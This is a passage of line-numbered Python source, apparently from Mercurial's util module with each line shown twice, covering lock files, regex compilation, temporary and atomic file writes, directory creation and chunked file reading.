1731 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1731 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1732 ld = os.open(pathname, flags)
1732 ld = os.open(pathname, flags)
1733 os.write(ld, info)
1733 os.write(ld, info)
1734 os.close(ld)
1734 os.close(ld)
1735
1735
1736 def readlock(pathname):
1736 def readlock(pathname):
1737 try:
1737 try:
1738 return os.readlink(pathname)
1738 return os.readlink(pathname)
1739 except OSError as why:
1739 except OSError as why:
1740 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1740 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1741 raise
1741 raise
1742 except AttributeError: # no symlink in os
1742 except AttributeError: # no symlink in os
1743 pass
1743 pass
1744 fp = posixfile(pathname, 'rb')
1744 fp = posixfile(pathname, 'rb')
1745 r = fp.read()
1745 r = fp.read()
1746 fp.close()
1746 fp.close()
1747 return r
1747 return r
1748
1748
1749 def fstat(fp):
1749 def fstat(fp):
1750 '''stat file object that may not have fileno method.'''
1750 '''stat file object that may not have fileno method.'''
1751 try:
1751 try:
1752 return os.fstat(fp.fileno())
1752 return os.fstat(fp.fileno())
1753 except AttributeError:
1753 except AttributeError:
1754 return os.stat(fp.name)
1754 return os.stat(fp.name)
1755
1755
1756 # File system features
1756 # File system features
1757
1757
1758 def fscasesensitive(path):
1758 def fscasesensitive(path):
1759 """
1759 """
1760 Return true if the given path is on a case-sensitive filesystem
1760 Return true if the given path is on a case-sensitive filesystem
1761
1761
1762 Requires a path (like /foo/.hg) ending with a foldable final
1762 Requires a path (like /foo/.hg) ending with a foldable final
1763 directory component.
1763 directory component.
1764 """
1764 """
1765 s1 = os.lstat(path)
1765 s1 = os.lstat(path)
1766 d, b = os.path.split(path)
1766 d, b = os.path.split(path)
1767 b2 = b.upper()
1767 b2 = b.upper()
1768 if b == b2:
1768 if b == b2:
1769 b2 = b.lower()
1769 b2 = b.lower()
1770 if b == b2:
1770 if b == b2:
1771 return True # no evidence against case sensitivity
1771 return True # no evidence against case sensitivity
1772 p2 = os.path.join(d, b2)
1772 p2 = os.path.join(d, b2)
1773 try:
1773 try:
1774 s2 = os.lstat(p2)
1774 s2 = os.lstat(p2)
1775 if s2 == s1:
1775 if s2 == s1:
1776 return False
1776 return False
1777 return True
1777 return True
1778 except OSError:
1778 except OSError:
1779 return True
1779 return True
1780
1780
1781 try:
1781 try:
1782 import re2
1782 import re2
1783 _re2 = None
1783 _re2 = None
1784 except ImportError:
1784 except ImportError:
1785 _re2 = False
1785 _re2 = False
1786
1786
1787 class _re(object):
1787 class _re(object):
1788 def _checkre2(self):
1788 def _checkre2(self):
1789 global _re2
1789 global _re2
1790 try:
1790 try:
1791 # check if match works, see issue3964
1791 # check if match works, see issue3964
1792 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1792 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1793 except ImportError:
1793 except ImportError:
1794 _re2 = False
1794 _re2 = False
1795
1795
1796 def compile(self, pat, flags=0):
1796 def compile(self, pat, flags=0):
1797 '''Compile a regular expression, using re2 if possible
1797 '''Compile a regular expression, using re2 if possible
1798
1798
1799 For best performance, use only re2-compatible regexp features. The
1799 For best performance, use only re2-compatible regexp features. The
1800 only flags from the re module that are re2-compatible are
1800 only flags from the re module that are re2-compatible are
1801 IGNORECASE and MULTILINE.'''
1801 IGNORECASE and MULTILINE.'''
1802 if _re2 is None:
1802 if _re2 is None:
1803 self._checkre2()
1803 self._checkre2()
1804 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1804 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1805 if flags & remod.IGNORECASE:
1805 if flags & remod.IGNORECASE:
1806 pat = '(?i)' + pat
1806 pat = '(?i)' + pat
1807 if flags & remod.MULTILINE:
1807 if flags & remod.MULTILINE:
1808 pat = '(?m)' + pat
1808 pat = '(?m)' + pat
1809 try:
1809 try:
1810 return re2.compile(pat)
1810 return re2.compile(pat)
1811 except re2.error:
1811 except re2.error:
1812 pass
1812 pass
1813 return remod.compile(pat, flags)
1813 return remod.compile(pat, flags)
1814
1814
1815 @propertycache
1815 @propertycache
1816 def escape(self):
1816 def escape(self):
1817 '''Return the version of escape corresponding to self.compile.
1817 '''Return the version of escape corresponding to self.compile.
1818
1818
1819 This is imperfect because whether re2 or re is used for a particular
1819 This is imperfect because whether re2 or re is used for a particular
1820 function depends on the flags, etc, but it's the best we can do.
1820 function depends on the flags, etc, but it's the best we can do.
1821 '''
1821 '''
1822 global _re2
1822 global _re2
1823 if _re2 is None:
1823 if _re2 is None:
1824 self._checkre2()
1824 self._checkre2()
1825 if _re2:
1825 if _re2:
1826 return re2.escape
1826 return re2.escape
1827 else:
1827 else:
1828 return remod.escape
1828 return remod.escape
1829
1829
1830 re = _re()
1830 re = _re()
1831
1831
1832 _fspathcache = {}
1832 _fspathcache = {}
1833 def fspath(name, root):
1833 def fspath(name, root):
1834 '''Get name in the case stored in the filesystem
1834 '''Get name in the case stored in the filesystem
1835
1835
1836 The name should be relative to root, and be normcase-ed for efficiency.
1836 The name should be relative to root, and be normcase-ed for efficiency.
1837
1837
1838 Note that this function is unnecessary, and should not be
1838 Note that this function is unnecessary, and should not be
1839 called, for case-sensitive filesystems (simply because it's expensive).
1839 called, for case-sensitive filesystems (simply because it's expensive).
1840
1840
1841 The root should be normcase-ed, too.
1841 The root should be normcase-ed, too.
1842 '''
1842 '''
1843 def _makefspathcacheentry(dir):
1843 def _makefspathcacheentry(dir):
1844 return dict((normcase(n), n) for n in os.listdir(dir))
1844 return dict((normcase(n), n) for n in os.listdir(dir))
1845
1845
1846 seps = pycompat.ossep
1846 seps = pycompat.ossep
1847 if pycompat.osaltsep:
1847 if pycompat.osaltsep:
1848 seps = seps + pycompat.osaltsep
1848 seps = seps + pycompat.osaltsep
1849 # Protect backslashes. This gets silly very quickly.
1849 # Protect backslashes. This gets silly very quickly.
1850 seps.replace('\\','\\\\')
1850 seps.replace('\\','\\\\')
1851 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1851 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1852 dir = os.path.normpath(root)
1852 dir = os.path.normpath(root)
1853 result = []
1853 result = []
1854 for part, sep in pattern.findall(name):
1854 for part, sep in pattern.findall(name):
1855 if sep:
1855 if sep:
1856 result.append(sep)
1856 result.append(sep)
1857 continue
1857 continue
1858
1858
1859 if dir not in _fspathcache:
1859 if dir not in _fspathcache:
1860 _fspathcache[dir] = _makefspathcacheentry(dir)
1860 _fspathcache[dir] = _makefspathcacheentry(dir)
1861 contents = _fspathcache[dir]
1861 contents = _fspathcache[dir]
1862
1862
1863 found = contents.get(part)
1863 found = contents.get(part)
1864 if not found:
1864 if not found:
1865 # retry "once per directory" per "dirstate.walk" which
1865 # retry "once per directory" per "dirstate.walk" which
1866 # may take place for each patches of "hg qpush", for example
1866 # may take place for each patches of "hg qpush", for example
1867 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1867 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1868 found = contents.get(part)
1868 found = contents.get(part)
1869
1869
1870 result.append(found or part)
1870 result.append(found or part)
1871 dir = os.path.join(dir, part)
1871 dir = os.path.join(dir, part)
1872
1872
1873 return ''.join(result)
1873 return ''.join(result)
1874
1874
1875 def checknlink(testfile):
1875 def checknlink(testfile):
1876 '''check whether hardlink count reporting works properly'''
1876 '''check whether hardlink count reporting works properly'''
1877
1877
1878 # testfile may be open, so we need a separate file for checking to
1878 # testfile may be open, so we need a separate file for checking to
1879 # work around issue2543 (or testfile may get lost on Samba shares)
1879 # work around issue2543 (or testfile may get lost on Samba shares)
1880 f1, f2, fp = None, None, None
1880 f1, f2, fp = None, None, None
1881 try:
1881 try:
1882 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1882 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1883 suffix='1~', dir=os.path.dirname(testfile))
1883 suffix='1~', dir=os.path.dirname(testfile))
1884 os.close(fd)
1884 os.close(fd)
1885 f2 = '%s2~' % f1[:-2]
1885 f2 = '%s2~' % f1[:-2]
1886
1886
1887 oslink(f1, f2)
1887 oslink(f1, f2)
1888 # nlinks() may behave differently for files on Windows shares if
1888 # nlinks() may behave differently for files on Windows shares if
1889 # the file is open.
1889 # the file is open.
1890 fp = posixfile(f2)
1890 fp = posixfile(f2)
1891 return nlinks(f2) > 1
1891 return nlinks(f2) > 1
1892 except OSError:
1892 except OSError:
1893 return False
1893 return False
1894 finally:
1894 finally:
1895 if fp is not None:
1895 if fp is not None:
1896 fp.close()
1896 fp.close()
1897 for f in (f1, f2):
1897 for f in (f1, f2):
1898 try:
1898 try:
1899 if f is not None:
1899 if f is not None:
1900 os.unlink(f)
1900 os.unlink(f)
1901 except OSError:
1901 except OSError:
1902 pass
1902 pass
1903
1903
1904 def endswithsep(path):
1904 def endswithsep(path):
1905 '''Check path ends with os.sep or os.altsep.'''
1905 '''Check path ends with os.sep or os.altsep.'''
1906 return (path.endswith(pycompat.ossep)
1906 return (path.endswith(pycompat.ossep)
1907 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1907 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1908
1908
1909 def splitpath(path):
1909 def splitpath(path):
1910 '''Split path by os.sep.
1910 '''Split path by os.sep.
1911 Note that this function does not use os.altsep because this is
1911 Note that this function does not use os.altsep because this is
1912 an alternative of simple "xxx.split(os.sep)".
1912 an alternative of simple "xxx.split(os.sep)".
1913 It is recommended to use os.path.normpath() before using this
1913 It is recommended to use os.path.normpath() before using this
1914 function if need.'''
1914 function if need.'''
1915 return path.split(pycompat.ossep)
1915 return path.split(pycompat.ossep)
1916
1916
1917 def mktempcopy(name, emptyok=False, createmode=None):
1917 def mktempcopy(name, emptyok=False, createmode=None):
1918 """Create a temporary file with the same contents from name
1918 """Create a temporary file with the same contents from name
1919
1919
1920 The permission bits are copied from the original file.
1920 The permission bits are copied from the original file.
1921
1921
1922 If the temporary file is going to be truncated immediately, you
1922 If the temporary file is going to be truncated immediately, you
1923 can use emptyok=True as an optimization.
1923 can use emptyok=True as an optimization.
1924
1924
1925 Returns the name of the temporary file.
1925 Returns the name of the temporary file.
1926 """
1926 """
1927 d, fn = os.path.split(name)
1927 d, fn = os.path.split(name)
1928 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1928 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1929 os.close(fd)
1929 os.close(fd)
1930 # Temporary files are created with mode 0600, which is usually not
1930 # Temporary files are created with mode 0600, which is usually not
1931 # what we want. If the original file already exists, just copy
1931 # what we want. If the original file already exists, just copy
1932 # its mode. Otherwise, manually obey umask.
1932 # its mode. Otherwise, manually obey umask.
1933 copymode(name, temp, createmode)
1933 copymode(name, temp, createmode)
1934 if emptyok:
1934 if emptyok:
1935 return temp
1935 return temp
1936 try:
1936 try:
1937 try:
1937 try:
1938 ifp = posixfile(name, "rb")
1938 ifp = posixfile(name, "rb")
1939 except IOError as inst:
1939 except IOError as inst:
1940 if inst.errno == errno.ENOENT:
1940 if inst.errno == errno.ENOENT:
1941 return temp
1941 return temp
1942 if not getattr(inst, 'filename', None):
1942 if not getattr(inst, 'filename', None):
1943 inst.filename = name
1943 inst.filename = name
1944 raise
1944 raise
1945 ofp = posixfile(temp, "wb")
1945 ofp = posixfile(temp, "wb")
1946 for chunk in filechunkiter(ifp):
1946 for chunk in filechunkiter(ifp):
1947 ofp.write(chunk)
1947 ofp.write(chunk)
1948 ifp.close()
1948 ifp.close()
1949 ofp.close()
1949 ofp.close()
1950 except: # re-raises
1950 except: # re-raises
1951 try:
1951 try:
1952 os.unlink(temp)
1952 os.unlink(temp)
1953 except OSError:
1953 except OSError:
1954 pass
1954 pass
1955 raise
1955 raise
1956 return temp
1956 return temp
1957
1957
1958 class filestat(object):
1958 class filestat(object):
1959 """help to exactly detect change of a file
1959 """help to exactly detect change of a file
1960
1960
1961 'stat' attribute is result of 'os.stat()' if specified 'path'
1961 'stat' attribute is result of 'os.stat()' if specified 'path'
1962 exists. Otherwise, it is None. This can avoid preparative
1962 exists. Otherwise, it is None. This can avoid preparative
1963 'exists()' examination on client side of this class.
1963 'exists()' examination on client side of this class.
1964 """
1964 """
1965 def __init__(self, stat):
1965 def __init__(self, stat):
1966 self.stat = stat
1966 self.stat = stat
1967
1967
1968 @classmethod
1968 @classmethod
1969 def frompath(cls, path):
1969 def frompath(cls, path):
1970 try:
1970 try:
1971 stat = os.stat(path)
1971 stat = os.stat(path)
1972 except OSError as err:
1972 except OSError as err:
1973 if err.errno != errno.ENOENT:
1973 if err.errno != errno.ENOENT:
1974 raise
1974 raise
1975 stat = None
1975 stat = None
1976 return cls(stat)
1976 return cls(stat)
1977
1977
1978 @classmethod
1978 @classmethod
1979 def fromfp(cls, fp):
1979 def fromfp(cls, fp):
1980 stat = os.fstat(fp.fileno())
1980 stat = os.fstat(fp.fileno())
1981 return cls(stat)
1981 return cls(stat)
1982
1982
1983 __hash__ = object.__hash__
1983 __hash__ = object.__hash__
1984
1984
1985 def __eq__(self, old):
1985 def __eq__(self, old):
1986 try:
1986 try:
1987 # if ambiguity between stat of new and old file is
1987 # if ambiguity between stat of new and old file is
1988 # avoided, comparison of size, ctime and mtime is enough
1988 # avoided, comparison of size, ctime and mtime is enough
1989 # to exactly detect change of a file regardless of platform
1989 # to exactly detect change of a file regardless of platform
1990 return (self.stat.st_size == old.stat.st_size and
1990 return (self.stat.st_size == old.stat.st_size and
1991 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
1991 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
1992 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
1992 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
1993 except AttributeError:
1993 except AttributeError:
1994 pass
1994 pass
1995 try:
1995 try:
1996 return self.stat is None and old.stat is None
1996 return self.stat is None and old.stat is None
1997 except AttributeError:
1997 except AttributeError:
1998 return False
1998 return False
1999
1999
2000 def isambig(self, old):
2000 def isambig(self, old):
2001 """Examine whether new (= self) stat is ambiguous against old one
2001 """Examine whether new (= self) stat is ambiguous against old one
2002
2002
2003 "S[N]" below means stat of a file at N-th change:
2003 "S[N]" below means stat of a file at N-th change:
2004
2004
2005 - S[n-1].ctime < S[n].ctime: can detect change of a file
2005 - S[n-1].ctime < S[n].ctime: can detect change of a file
2006 - S[n-1].ctime == S[n].ctime
2006 - S[n-1].ctime == S[n].ctime
2007 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2007 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2008 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2008 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2009 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2009 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2010 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2010 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2011
2011
2012 Case (*2) above means that a file was changed twice or more at
2012 Case (*2) above means that a file was changed twice or more at
2013 same time in sec (= S[n-1].ctime), and comparison of timestamp
2013 same time in sec (= S[n-1].ctime), and comparison of timestamp
2014 is ambiguous.
2014 is ambiguous.
2015
2015
2016 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2016 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2017 timestamp is ambiguous".
2017 timestamp is ambiguous".
2018
2018
2019 But advancing mtime only in case (*2) doesn't work as
2019 But advancing mtime only in case (*2) doesn't work as
2020 expected, because naturally advanced S[n].mtime in case (*1)
2020 expected, because naturally advanced S[n].mtime in case (*1)
2021 might be equal to manually advanced S[n-1 or earlier].mtime.
2021 might be equal to manually advanced S[n-1 or earlier].mtime.
2022
2022
2023 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2023 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2024 treated as ambiguous regardless of mtime, to avoid overlooking
2024 treated as ambiguous regardless of mtime, to avoid overlooking
2025 by confliction between such mtime.
2025 by confliction between such mtime.
2026
2026
2027 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2027 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2028 S[n].mtime", even if size of a file isn't changed.
2028 S[n].mtime", even if size of a file isn't changed.
2029 """
2029 """
2030 try:
2030 try:
2031 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2031 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2032 except AttributeError:
2032 except AttributeError:
2033 return False
2033 return False
2034
2034
2035 def avoidambig(self, path, old):
2035 def avoidambig(self, path, old):
2036 """Change file stat of specified path to avoid ambiguity
2036 """Change file stat of specified path to avoid ambiguity
2037
2037
2038 'old' should be previous filestat of 'path'.
2038 'old' should be previous filestat of 'path'.
2039
2039
2040 This skips avoiding ambiguity, if a process doesn't have
2040 This skips avoiding ambiguity, if a process doesn't have
2041 appropriate privileges for 'path'. This returns False in this
2041 appropriate privileges for 'path'. This returns False in this
2042 case.
2042 case.
2043
2043
2044 Otherwise, this returns True, as "ambiguity is avoided".
2044 Otherwise, this returns True, as "ambiguity is avoided".
2045 """
2045 """
2046 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2046 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2047 try:
2047 try:
2048 os.utime(path, (advanced, advanced))
2048 os.utime(path, (advanced, advanced))
2049 except OSError as inst:
2049 except OSError as inst:
2050 if inst.errno == errno.EPERM:
2050 if inst.errno == errno.EPERM:
2051 # utime() on the file created by another user causes EPERM,
2051 # utime() on the file created by another user causes EPERM,
2052 # if a process doesn't have appropriate privileges
2052 # if a process doesn't have appropriate privileges
2053 return False
2053 return False
2054 raise
2054 raise
2055 return True
2055 return True
2056
2056
2057 def __ne__(self, other):
2057 def __ne__(self, other):
2058 return not self == other
2058 return not self == other
2059
2059
2060 class atomictempfile(object):
2060 class atomictempfile(object):
2061 '''writable file object that atomically updates a file
2061 '''writable file object that atomically updates a file
2062
2062
2063 All writes will go to a temporary copy of the original file. Call
2063 All writes will go to a temporary copy of the original file. Call
2064 close() when you are done writing, and atomictempfile will rename
2064 close() when you are done writing, and atomictempfile will rename
2065 the temporary copy to the original name, making the changes
2065 the temporary copy to the original name, making the changes
2066 visible. If the object is destroyed without being closed, all your
2066 visible. If the object is destroyed without being closed, all your
2067 writes are discarded.
2067 writes are discarded.
2068
2068
2069 checkambig argument of constructor is used with filestat, and is
2069 checkambig argument of constructor is used with filestat, and is
2070 useful only if target file is guarded by any lock (e.g. repo.lock
2070 useful only if target file is guarded by any lock (e.g. repo.lock
2071 or repo.wlock).
2071 or repo.wlock).
2072 '''
2072 '''
2073 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2073 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2074 self.__name = name # permanent name
2074 self.__name = name # permanent name
2075 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2075 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2076 createmode=createmode)
2076 createmode=createmode)
2077 self._fp = posixfile(self._tempname, mode)
2077 self._fp = posixfile(self._tempname, mode)
2078 self._checkambig = checkambig
2078 self._checkambig = checkambig
2079
2079
2080 # delegated methods
2080 # delegated methods
2081 self.read = self._fp.read
2081 self.read = self._fp.read
2082 self.write = self._fp.write
2082 self.write = self._fp.write
2083 self.seek = self._fp.seek
2083 self.seek = self._fp.seek
2084 self.tell = self._fp.tell
2084 self.tell = self._fp.tell
2085 self.fileno = self._fp.fileno
2085 self.fileno = self._fp.fileno
2086
2086
2087 def close(self):
2087 def close(self):
2088 if not self._fp.closed:
2088 if not self._fp.closed:
2089 self._fp.close()
2089 self._fp.close()
2090 filename = localpath(self.__name)
2090 filename = localpath(self.__name)
2091 oldstat = self._checkambig and filestat.frompath(filename)
2091 oldstat = self._checkambig and filestat.frompath(filename)
2092 if oldstat and oldstat.stat:
2092 if oldstat and oldstat.stat:
2093 rename(self._tempname, filename)
2093 rename(self._tempname, filename)
2094 newstat = filestat.frompath(filename)
2094 newstat = filestat.frompath(filename)
2095 if newstat.isambig(oldstat):
2095 if newstat.isambig(oldstat):
2096 # stat of changed file is ambiguous to original one
2096 # stat of changed file is ambiguous to original one
2097 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2097 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2098 os.utime(filename, (advanced, advanced))
2098 os.utime(filename, (advanced, advanced))
2099 else:
2099 else:
2100 rename(self._tempname, filename)
2100 rename(self._tempname, filename)
2101
2101
2102 def discard(self):
2102 def discard(self):
2103 if not self._fp.closed:
2103 if not self._fp.closed:
2104 try:
2104 try:
2105 os.unlink(self._tempname)
2105 os.unlink(self._tempname)
2106 except OSError:
2106 except OSError:
2107 pass
2107 pass
2108 self._fp.close()
2108 self._fp.close()
2109
2109
2110 def __del__(self):
2110 def __del__(self):
2111 if safehasattr(self, '_fp'): # constructor actually did something
2111 if safehasattr(self, '_fp'): # constructor actually did something
2112 self.discard()
2112 self.discard()
2113
2113
2114 def __enter__(self):
2114 def __enter__(self):
2115 return self
2115 return self
2116
2116
2117 def __exit__(self, exctype, excvalue, traceback):
2117 def __exit__(self, exctype, excvalue, traceback):
2118 if exctype is not None:
2118 if exctype is not None:
2119 self.discard()
2119 self.discard()
2120 else:
2120 else:
2121 self.close()
2121 self.close()
2122
2122
2123 def unlinkpath(f, ignoremissing=False):
2123 def unlinkpath(f, ignoremissing=False):
2124 """unlink and remove the directory if it is empty"""
2124 """unlink and remove the directory if it is empty"""
2125 if ignoremissing:
2125 if ignoremissing:
2126 tryunlink(f)
2126 tryunlink(f)
2127 else:
2127 else:
2128 unlink(f)
2128 unlink(f)
2129 # try removing directories that might now be empty
2129 # try removing directories that might now be empty
2130 try:
2130 try:
2131 removedirs(os.path.dirname(f))
2131 removedirs(os.path.dirname(f))
2132 except OSError:
2132 except OSError:
2133 pass
2133 pass
2134
2134
2135 def tryunlink(f):
2135 def tryunlink(f):
2136 """Attempt to remove a file, ignoring ENOENT errors."""
2136 """Attempt to remove a file, ignoring ENOENT errors."""
2137 try:
2137 try:
2138 unlink(f)
2138 unlink(f)
2139 except OSError as e:
2139 except OSError as e:
2140 if e.errno != errno.ENOENT:
2140 if e.errno != errno.ENOENT:
2141 raise
2141 raise
2142
2142
2143 def makedirs(name, mode=None, notindexed=False):
2143 def makedirs(name, mode=None, notindexed=False):
2144 """recursive directory creation with parent mode inheritance
2144 """recursive directory creation with parent mode inheritance
2145
2145
2146 Newly created directories are marked as "not to be indexed by
2146 Newly created directories are marked as "not to be indexed by
2147 the content indexing service", if ``notindexed`` is specified
2147 the content indexing service", if ``notindexed`` is specified
2148 for "write" mode access.
2148 for "write" mode access.
2149 """
2149 """
2150 try:
2150 try:
2151 makedir(name, notindexed)
2151 makedir(name, notindexed)
2152 except OSError as err:
2152 except OSError as err:
2153 if err.errno == errno.EEXIST:
2153 if err.errno == errno.EEXIST:
2154 return
2154 return
2155 if err.errno != errno.ENOENT or not name:
2155 if err.errno != errno.ENOENT or not name:
2156 raise
2156 raise
2157 parent = os.path.dirname(os.path.abspath(name))
2157 parent = os.path.dirname(os.path.abspath(name))
2158 if parent == name:
2158 if parent == name:
2159 raise
2159 raise
2160 makedirs(parent, mode, notindexed)
2160 makedirs(parent, mode, notindexed)
2161 try:
2161 try:
2162 makedir(name, notindexed)
2162 makedir(name, notindexed)
2163 except OSError as err:
2163 except OSError as err:
2164 # Catch EEXIST to handle races
2164 # Catch EEXIST to handle races
2165 if err.errno == errno.EEXIST:
2165 if err.errno == errno.EEXIST:
2166 return
2166 return
2167 raise
2167 raise
2168 if mode is not None:
2168 if mode is not None:
2169 os.chmod(name, mode)
2169 os.chmod(name, mode)
2170
2170
2171 def readfile(path):
2171 def readfile(path):
2172 with open(path, 'rb') as fp:
2172 with open(path, 'rb') as fp:
2173 return fp.read()
2173 return fp.read()
2174
2174
2175 def writefile(path, text):
2175 def writefile(path, text):
2176 with open(path, 'wb') as fp:
2176 with open(path, 'wb') as fp:
2177 fp.write(text)
2177 fp.write(text)
2178
2178
2179 def appendfile(path, text):
2179 def appendfile(path, text):
2180 with open(path, 'ab') as fp:
2180 with open(path, 'ab') as fp:
2181 fp.write(text)
2181 fp.write(text)
2182
2182
2183 class chunkbuffer(object):
2183 class chunkbuffer(object):
2184 """Allow arbitrary sized chunks of data to be efficiently read from an
2184 """Allow arbitrary sized chunks of data to be efficiently read from an
2185 iterator over chunks of arbitrary size."""
2185 iterator over chunks of arbitrary size."""
2186
2186
2187 def __init__(self, in_iter):
2187 def __init__(self, in_iter):
2188 """in_iter is the iterator that's iterating over the input chunks."""
2188 """in_iter is the iterator that's iterating over the input chunks."""
2189 def splitbig(chunks):
2189 def splitbig(chunks):
2190 for chunk in chunks:
2190 for chunk in chunks:
2191 if len(chunk) > 2**20:
2191 if len(chunk) > 2**20:
2192 pos = 0
2192 pos = 0
2193 while pos < len(chunk):
2193 while pos < len(chunk):
2194 end = pos + 2 ** 18
2194 end = pos + 2 ** 18
2195 yield chunk[pos:end]
2195 yield chunk[pos:end]
2196 pos = end
2196 pos = end
2197 else:
2197 else:
2198 yield chunk
2198 yield chunk
2199 self.iter = splitbig(in_iter)
2199 self.iter = splitbig(in_iter)
2200 self._queue = collections.deque()
2200 self._queue = collections.deque()
2201 self._chunkoffset = 0
2201 self._chunkoffset = 0
2202
2202
2203 def read(self, l=None):
2203 def read(self, l=None):
2204 """Read L bytes of data from the iterator of chunks of data.
2204 """Read L bytes of data from the iterator of chunks of data.
2205 Returns less than L bytes if the iterator runs dry.
2205 Returns less than L bytes if the iterator runs dry.
2206
2206
2207 If size parameter is omitted, read everything"""
2207 If size parameter is omitted, read everything"""
2208 if l is None:
2208 if l is None:
2209 return ''.join(self.iter)
2209 return ''.join(self.iter)
2210
2210
2211 left = l
2211 left = l
2212 buf = []
2212 buf = []
2213 queue = self._queue
2213 queue = self._queue
2214 while left > 0:
2214 while left > 0:
2215 # refill the queue
2215 # refill the queue
2216 if not queue:
2216 if not queue:
2217 target = 2**18
2217 target = 2**18
2218 for chunk in self.iter:
2218 for chunk in self.iter:
2219 queue.append(chunk)
2219 queue.append(chunk)
2220 target -= len(chunk)
2220 target -= len(chunk)
2221 if target <= 0:
2221 if target <= 0:
2222 break
2222 break
2223 if not queue:
2223 if not queue:
2224 break
2224 break
2225
2225
2226 # The easy way to do this would be to queue.popleft(), modify the
2226 # The easy way to do this would be to queue.popleft(), modify the
2227 # chunk (if necessary), then queue.appendleft(). However, for cases
2227 # chunk (if necessary), then queue.appendleft(). However, for cases
2228 # where we read partial chunk content, this incurs 2 dequeue
2228 # where we read partial chunk content, this incurs 2 dequeue
2229 # mutations and creates a new str for the remaining chunk in the
2229 # mutations and creates a new str for the remaining chunk in the
2230 # queue. Our code below avoids this overhead.
2230 # queue. Our code below avoids this overhead.
2231
2231
2232 chunk = queue[0]
2232 chunk = queue[0]
2233 chunkl = len(chunk)
2233 chunkl = len(chunk)
2234 offset = self._chunkoffset
2234 offset = self._chunkoffset
2235
2235
2236 # Use full chunk.
2236 # Use full chunk.
2237 if offset == 0 and left >= chunkl:
2237 if offset == 0 and left >= chunkl:
2238 left -= chunkl
2238 left -= chunkl
2239 queue.popleft()
2239 queue.popleft()
2240 buf.append(chunk)
2240 buf.append(chunk)
2241 # self._chunkoffset remains at 0.
2241 # self._chunkoffset remains at 0.
2242 continue
2242 continue
2243
2243
2244 chunkremaining = chunkl - offset
2244 chunkremaining = chunkl - offset
2245
2245
2246 # Use all of unconsumed part of chunk.
2246 # Use all of unconsumed part of chunk.
2247 if left >= chunkremaining:
2247 if left >= chunkremaining:
2248 left -= chunkremaining
2248 left -= chunkremaining
2249 queue.popleft()
2249 queue.popleft()
2250 # offset == 0 is enabled by block above, so this won't merely
2250 # offset == 0 is enabled by block above, so this won't merely
2251 # copy via ``chunk[0:]``.
2251 # copy via ``chunk[0:]``.
2252 buf.append(chunk[offset:])
2252 buf.append(chunk[offset:])
2253 self._chunkoffset = 0
2253 self._chunkoffset = 0
2254
2254
2255 # Partial chunk needed.
2255 # Partial chunk needed.
2256 else:
2256 else:
2257 buf.append(chunk[offset:offset + left])
2257 buf.append(chunk[offset:offset + left])
2258 self._chunkoffset += left
2258 self._chunkoffset += left
2259 left -= chunkremaining
2259 left -= chunkremaining
2260
2260
2261 return ''.join(buf)
2261 return ''.join(buf)
2262
2262
2263 def filechunkiter(f, size=131072, limit=None):
2263 def filechunkiter(f, size=131072, limit=None):
2264 """Create a generator that produces the data in the file size
2264 """Create a generator that produces the data in the file size
2265 (default 131072) bytes at a time, up to optional limit (default is
2265 (default 131072) bytes at a time, up to optional limit (default is
2266 to read all data). Chunks may be less than size bytes if the
2266 to read all data). Chunks may be less than size bytes if the
2267 chunk is the last chunk in the file, or the file is a socket or
2267 chunk is the last chunk in the file, or the file is a socket or
2268 some other type of file that sometimes reads less data than is
2268 some other type of file that sometimes reads less data than is
2269 requested."""
2269 requested."""
2270 assert size >= 0
2270 assert size >= 0
2271 assert limit is None or limit >= 0
2271 assert limit is None or limit >= 0
2272 while True:
2272 while True:
2273 if limit is None:
2273 if limit is None:
2274 nbytes = size
2274 nbytes = size
2275 else:
